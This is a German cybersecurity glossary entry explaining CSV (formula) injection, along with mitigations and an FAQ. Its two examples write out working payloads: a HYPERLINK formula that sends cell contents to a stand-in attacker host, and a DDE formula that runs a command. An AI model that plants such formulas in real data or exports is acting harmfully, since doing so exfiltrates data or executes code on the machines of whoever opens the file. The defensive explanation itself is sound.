CSV-Injection
Was ist CSV-Injection?
CSV-InjectionAngriff, der Tabellenkalkulationsformeln in exportierte CSV-Dateien einbettet, sodass das Öffnen in Excel oder Sheets vom Angreifer gesteuerte Aktionen ausführt.
CSV-Injection, auch Formel-Injection genannt, missbraucht Tabellenkalkulationen, die Zellen, die mit =, +, -, @ oder einem Tabulator beziehungsweise Zeilenumbruch beginnen, automatisch auswerten. Speichert eine Webanwendung Angreifereingaben und exportiert sie später als CSV, kann das resultierende Arbeitsblatt beim Öffnen DDE auslösen, externe URLs aufrufen, Daten exfiltrieren oder Schadsoftware nachladen. Das Risiko liegt beim Konsumenten der Datei, nicht in der Datenbank, und wird im Code-Review leicht übersehen. Schutz: jeder Zelle, die mit einem gefährlichen Zeichen beginnt, ein Hochkomma oder anderes sicheres Präfix voranstellen, Felder vor dem Export validieren und maskieren und Nutzer vor dem Öffnen nicht vertrauenswürdiger Arbeitsblätter warnen.
● Beispiele
- 01
Ein Kontaktformular akzeptiert im Namensfeld =HYPERLINK("https://angreifer.example/?l="&A2,"Klick") und exfiltriert beim Öffnen weitere Zellen.
- 02
Ein exportierter CRM-Bericht enthält =cmd|'/c calc'!A1 und löst in älteren Excel-Versionen DDE aus.
● Häufige Fragen
Was ist CSV-Injection?
Angriff, der Tabellenkalkulationsformeln in exportierte CSV-Dateien einbettet, sodass das Öffnen in Excel oder Sheets vom Angreifer gesteuerte Aktionen ausführt. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.
Was bedeutet CSV-Injection?
Angriff, der Tabellenkalkulationsformeln in exportierte CSV-Dateien einbettet, sodass das Öffnen in Excel oder Sheets vom Angreifer gesteuerte Aktionen ausführt.
Wie schützt man sich gegen CSV-Injection?
Schutzmaßnahmen gegen CSV-Injection kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.
Welche anderen Bezeichnungen gibt es für CSV-Injection?
Übliche alternative Bezeichnungen: Formel-Injection, Excel-Makro-Injection.